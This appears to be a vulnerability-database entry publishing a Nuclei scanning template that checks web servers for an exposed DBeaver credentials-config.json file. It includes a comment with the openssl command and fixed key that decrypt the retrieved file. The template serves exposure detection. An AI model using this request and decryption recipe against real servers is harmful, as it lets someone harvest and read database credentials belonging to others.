漏洞描述
DBeaver credentials were discovered.
dbeaver-credentials: DBeaver - Credentials Discovery
PoC代码[已公开]
id: dbeaver-credentials
info:
name: DBeaver - Credentials Discovery
author: geeknik,j4vaovo
severity: medium
description: DBeaver credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
max-request: 2
tags: exposure,dbeaver,vuln
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
GET /{{str}}.json HTTP/1.1
Host: {{Hostname}}
- |
GET /.dbeaver/credentials-config.json HTTP/1.1
Host: {{Hostname}}
# To decode the credentials file, use following command:
# openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_2 == 200"
- "len(body_2) > 2"
- "contains(header_2, 'application/octet-stream')"
- "len(body_1) != len(body_2)"
- "!contains(tolower(body_2), '<html')"
- "!contains(tolower(body_2), '<body')"
- "!contains(tolower(body_2), '<iframe')"
condition: and
# digest: 4b0a00483046022100dfea2049f867d974fa8da3533ceb8ba345a1b01eca415893c9e99acd6a24271c02210081b013f04affa88685688a61b67df122453fd1b1079047373eb84161cf3ef655:922c64590222798bb761d5b6d8e72950